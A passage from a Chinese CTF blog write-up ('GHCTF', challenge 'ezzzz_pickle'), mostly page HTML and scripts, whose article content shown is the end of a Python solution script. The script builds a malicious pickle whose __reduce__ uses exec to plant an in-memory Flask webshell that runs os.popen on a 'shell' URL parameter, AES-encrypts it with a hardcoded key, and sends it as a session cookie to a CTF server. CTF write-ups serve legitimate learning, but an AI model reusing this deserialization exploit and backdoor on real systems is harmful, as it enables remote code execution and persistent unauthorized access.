class="string">&#x27;encrypt&#x27;</span></span>):</span><br><span class="line"> cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_ba</span><br><span class="line">ckend())</span><br><span class="line"> <span class="keyword">if</span> mode == <span class="string">&#x27;encrypt&#x27;</span>:</span><br><span class="line"> encryptor = cipher.encryptor()</span><br><span class="line"> padder = padding.PKCS7(algorithms.AES.block_size).padder()</span><br><span class="line"> padded_data = padder.update(data.encode()) + padder.finalize()</span><br><span class="line"> result = encryptor.update(padded_data) + encryptor.finalize()</span><br><span class="line"> <span class="keyword">return</span> base64.b64encode(result).decode() </span><br><span class="line"> <span class="keyword">elif</span> mode == <span class="string">&#x27;decrypt&#x27;</span>:</span><br><span class="line"> decryptor = cipher.decryptor()</span><br><span class="line"> encrypted_data_bytes = base64.b64decode(data)</span><br><span class="line"> decrypted_data = decryptor.update(encrypted_data_bytes) + decrypto</span><br><span class="line">r.finalize()</span><br><span class="line"> unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()</span><br><span class="line"> unpadded_data = unpadder.update(decrypted_data) + unpadder.finaliz</span><br><span class="line">e()</span><br><span class="line"> <span class="keyword">return</span> unpadded_data.decode()</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">A</span>():</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line"> <span class="keyword">return</span> (<span class="built_in">exec</span>,(<span class="string">&quot;global exc_class;global code;exc_class, code = app.</span></span><br><span class="line"><span class="string">_get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_clas</span></span><br><span class="line"><span class="string">s] = lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;shell&#x27;)).read()&quot;</span>,))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exp</span>(<span class="params">url</span>):</span><br><span class="line"> a = A()</span><br><span class="line"> pickled = pickle.dumps(a)</span><br><span class="line"> <span class="built_in">print</span>(pickled)</span><br><span class="line"> key = <span class="string">b&quot;ajwdopldwjdowpajdmslkmwjrfhgnbbv&quot;</span> </span><br><span class="line"> iv = <span class="string">b&quot;asdwdggiouewhgpw&quot;</span></span><br><span class="line"> pickled_data = base64.b64encode(pickled).decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line"> payload=aes_encrypt_decrypt(pickled_data,key,iv,mode=<span class="string">&#x27;encrypt&#x27;</span>)</span><br><span class="line"> <span class="built_in">print</span>(payload)</span><br><span class="line"> Cookie=&#123;<span class="string">&quot;session&quot;</span>:payload&#125;</span><br><span class="line"> request = requests.post(url,cookies=Cookie)</span><br><span class="line"> <span class="built_in">print</span>(request)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line"> url=<span class="string">&quot;http://node2.anna.nssctf.cn:28942/&quot;</span></span><br><span class="line"> exp(url)</span><br></pre></td></tr></table></figure>
      
    </div>
    <footer class="article-footer">
      
        <blockquote class="article-copyright">
    <p><strong><span class="icon-user icon"></span>Author: </strong>cc</p>
    <p><strong><span class="icon-link icon"></span>Permalink: </strong><a href="https://chq576.github.io/2026/01/28/GHCTF/">https://chq576.github.io/2026/01/28/GHCTF/</a></p>
    <p><strong><span class="icon-pencil icon"></span>Title: </strong>「GHCTF」</p>
    <p><strong><span class="icon-calendar icon"></span>Published: </strong>2026-01-28 21:08:37</p>
    <p><strong><span class="icon-calendar icon"></span>Updated: </strong>2026-01-31 00:25:07</p>
    <p><strong><span class="icon-copyright icon"></span>License: </strong>All articles on this blog are licensed under the <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener nofollow noreferrer" target="_blank"><span class="icon-creative-commons"></span>BY-NC-SA</a> license agreement unless otherwise stated. Please indicate the source when reprinting!</p>
    <span class="icon-creative-commons article-copyright-bg"></span>
  </blockquote>
      
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
  <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
    
    
    
    <div class="article-nav-link-wrap right">
      
        
        
          <img data-src="/images/cc.jpg" data-sizes="auto" alt="UPLOAD" class="lazyload">
        
      
      <a href="/2026/01/20/UPLOAD/" aria-label="Next: UPLOAD"  title="Next: UPLOAD"></a>
      <div class="article-nav-caption">Next</div>
      <h3 class="article-nav-title">
        
          UPLOAD
        
      </h3>
    </div>
    
  </nav>


</article>









  <section id="comments" data-aos="fade-up">
    <div class="comment-header">
      
      
        
      
      <h2 class="comment-title">Leave a comment</h2>
      <div class="comment-selector">
        <div class="comment-selector-wrap">
            
            <div class="selector-item" data-selector="giscus">
              <span>giscus</span>
            </div>
            
        </div>
      </div>
    </div>
    <div class="comment-content">
      
        <div class="comment giscus-comment" data-aos="fade-up"
          id="giscus-comment">
        </div>
      
    </div>
  </section>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      
      
      
        2020-2026
      
      <span class="footer-info-sep rotate"></span>
      cc
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        11k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        00:56
      </div>
    
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
    
      
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
  
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ezzzz-pickle"><span class="toc-number">1.</span> <span class="toc-text">ezzzz_pickle</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-number">1.1.</span> <span class="toc-text">任意文件读取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A"><span class="toc-number">1.2.</span> <span class="toc-text">目录穿越</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.3.</span> <span class="toc-text">内存马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WP"><span class="toc-number">1.4.</span> <span class="toc-text">WP</span></a></li></ol></li></ol>
  
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/jn.jpg" data-sizes="auto" alt="cc" class="lazyload">
  <div class="sidebar-author-name">cc</div>
  <div class="sidebar-description">章鱼哥喜欢海绵宝宝</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">3</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Friend</div>
      </div>
    
  
</div>
</div>
      
    
  </div>
  
    
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  
</nav>

    </div>
    
    
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



  
<script src="https://npm.webcache.cn/material-theme@1.0.0/dist/material-theme.umd.js" integrity="sha384-vLev0II0HKFaxkcm+&#x2F;7kX5IGwVFBASkGchU311wmU&#x2F;veIj2bB0UcBkQbW6yw2asK" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "cc",
          title: "GHCTF",
          url: "https://chq576.github.io/2026/01/28/GHCTF/",
          excerpt: "",
          description: "",
          stripContent: "ezzzz_pickle任意文件读取 漏洞的本质是：Web应用在处理文件路径时，没有对用户输行严格的校验和过滤，导致攻击者可以通过构造特殊路径（如 ..&amp;#x2F; ）来突破应用的访问限制，访问到预期之外的文件。   问题：os.path.join(“static”, filename) 未过滤..&amp;#x2F;等路径跳转字符，导致攻击者可构造路径读取任意文件。  123def dowload_file(filename):    path=os.path.join(&amp;quot;    stati",
          date: "Wed Jan 28 2026 21:08:37 GMT+0800",
          updated: "Sat Jan 31 2026 00:25:07 GMT+0800",
          cover: "/images/cc.jpg",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        const initPswp = (gallery, children) => {
          if (_$$(`${gallery} ${children}`).length > 0) {
            new PhotoSwipeLightbox({
              gallery,
              children,
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
        }
        const pswp = () => {
          initPswp('.article-entry', 'a.article-gallery-item');
          initPswp('.article-gallery', 'a.article-gallery-item');
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      
        








<script data-pjax>
  var loadScript = (src, integrity) => {
    const script = document.createElement('script');
    script.src = src;
    if (integrity) script.integrity = integrity;
    script.crossOrigin = 'anonymous';
    return script;
  };

  var commentConfigKeys = ["giscus"];
  var commentConfig = {
    
    
    
    
    
    giscus: {
      enable: true,
      load: () => {
        const container = document.querySelector('.giscus-comment');
        if (!container) return;
        container.style.display = 'block';

        // 删除可能已存在的 giscus 脚本和 iframe
        const existingScript = container.querySelector('script[src*="giscus.app/client.js"]');
        if (existingScript) existingScript.remove();
        const existingFrame = document.querySelector('iframe.giscus-frame');
        if (existingFrame) existingFrame.remove();

        const giscusScript = document.createElement('script');
        const domMode = document.documentElement.getAttribute("data-theme");

        const docLang = document.documentElement.lang || 'en';
        const langBase = docLang.split('-')[0];
        const supportedLangs = ['ar', 'be', 'bg', 'ca', 'cs', 'da', 'de', 'en', 
        'eo', 'es', 'eu', 'fa', 'fr', 'gr', 'hbs', 'he', 'hu', 'id', 'it', 'ja', 
        'kh', 'ko', 'nl', 'pl', 'pt', 'ro', 'ru', 'th', 'tr', 'uk', 'uz', 'vi', 'zh-CN', 'zh-HK', 'zh-TW'];
        const giscusLang = supportedLangs.includes(docLang) ? docLang : supportedLangs.includes(langBase) ? langBase : 'en';

        giscusScript.src = 'https://giscus.app/client.js';
        giscusScript.setAttribute('data-repo', '');
        giscusScript.setAttribute('data-repo-id', '');
        giscusScript.setAttribute('data-category', ''); 
        giscusScript.setAttribute('data-category-id', '');
        giscusScript.setAttribute('data-mapping', '0');
        giscusScript.setAttribute('data-strict', '0');
        giscusScript.setAttribute('data-reactions-enabled', '1');
        giscusScript.setAttribute('data-emit-metadata', '0');
        giscusScript.setAttribute('data-input-position', 'bottom');
        giscusScript.setAttribute('data-theme', domMode === 'dark' ? 'dark' : 'light');
        giscusScript.setAttribute('data-lang', giscusLang);
        giscusScript.setAttribute('crossorigin', 'anonymous');
        giscusScript.async = true;
        container.appendChild(giscusScript);
        document.body.addEventListener('light-theme-set', () => {
          const iframe = document.querySelector('iframe.giscus-frame');
          if (!iframe) return;
          iframe.contentWindow.postMessage({ giscus: { setConfig: { theme: 'light' } } }, 'https://giscus.app');
        });
        document.body.addEventListener('dark-theme-set', () => {
          const iframe = document.querySelector('iframe.giscus-frame');
          if (!iframe) return;
          iframe.contentWindow.postMessage({ giscus: { setConfig: { theme: 'dark' } } }, 'https://giscus.app');
        });
      }
    }
    
  }
  commentConfig.enable = commentConfigKeys.some(key => commentConfig[key].enable);

  var defaultComment = '';
  if (commentConfig.enable) {
    // 1. 首先检查localStorage中是否有保存的评论类型
    var savedCommentType = localStorage.getItem('commentType');
    
    // 2. 如果localStorage中有值且对应的评论系统可用，就使用它
    if (savedCommentType) {
      if (commentConfig[savedCommentType]?.enable) {
        defaultComment = savedCommentType;
      }
    }
    
    // 3. 如果localStorage无效，检查配置的默认评论系统
    if (!defaultComment) {
      var configDefault = 'waline';
      if (commentConfig[configDefault]?.enable) {
        defaultComment = configDefault;
      }
    }
    
    // 4. 如果前两项都无效，按指定顺序找到第一个可用的评论系统
    if (!defaultComment) {
      defaultComment = commentConfigKeys.find(sys => commentConfig[sys].enable) || '';
    }
  }
  function loadComments() {
    if (!commentConfig.enable) return;
    const loadedComments = {
      valine: false,
      waline: false,
      twikoo: false,
      gitalk: false,
      giscus: false
    };

    // 隐藏所有评论容器
    const hideAllComments = () => {
      const commentContainers = document.querySelectorAll('.comment');
      commentContainers.forEach(container => {
        container.style.display = 'none';
      });
    };

    // 按需加载评论系统
    const loadCommentSystem = (type) => {
      if (loadedComments[type]) {
        // 如果已加载，只需显示对应容器
        document.querySelector(`.${type}-comment`).style.display = 'block';
        return;
      }

      // 根据类型加载对应的脚本
      commentConfig[type]?.load();
      loadedComments[type] = true;
    };

    // 评论组件选择器
    const changeActiveCommentItems = (item) => {
      const commentItems = document.querySelectorAll('.selector-item');
      for (let i = 0; i < commentItems.length; i++) {
        commentItems[i].classList.remove('active');
      }
      item.classList.add('active');

      // 获取要加载的评论系统类型
      const commentType = item.getAttribute('data-selector');

      // 隐藏所有评论系统
      hideAllComments();

      // 加载选中的评论系统
      loadCommentSystem(commentType);
    };

    const commentInit = () => {
      // 评论组件选择器点击事件
      const commentItems = document.querySelectorAll('.selector-item');
      for (let item of commentItems) {
        item.addEventListener('click', () => {
          // 保存选择器状态
          const commentType = item.getAttribute('data-selector');
          window.localStorage.setItem('commentType', commentType);
          // 切换选中状态
          changeActiveCommentItems(item);
        });
      }

      // 检查是否需要加载默认评论系统
      if (defaultComment) {
        const defaultSelectorItem = document.querySelector(`[data-selector="${defaultComment}"]`);
        if (!defaultSelectorItem) return;
        defaultSelectorItem.style.display = 'block';
        defaultSelectorItem.classList.add('active');
        loadCommentSystem(defaultComment);
      }
    }

    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', commentInit);
    } else {
      commentInit();
    }
  };
  loadComments();
</script>

      
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.10.2' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/mathjax@3.2.2/es5/tex-mml-chtml.js" integrity="sha384-Wuix6BuhrWbjDBs24bXrjf4ZQ5aFeFWBuKkFekO2t8xFU0iNaLQfp2K6&#x2F;1Nxveei" crossorigin="anonymous" defer data-pjax></script>

    <script data-pjax>
      window.MathJax = {"tex":{"tags":"ams","useLabelIds":true,"inlineMath":[["$","$"],["\\\\(","\\\\)"]],"displayMath":[["$$","$$"],["\\\\[","\\\\]"]],"processEscapes":true,"processEnvironments":true,"autoload":{"color":[],"colorv2":["color"]},"packages":{"[+]":["noerrors"]}},"options":{"skipHtmlTags":["script","noscript","style","textarea","pre","code"],"ignoreHtmlClass":"tex2jax_ignore","processHtmlClass":"tex2jax_process"},"loader":{"load":["input/asciimath","[tex]/noerrors"]}};
    </script>
  







    
  </body>
  </html>

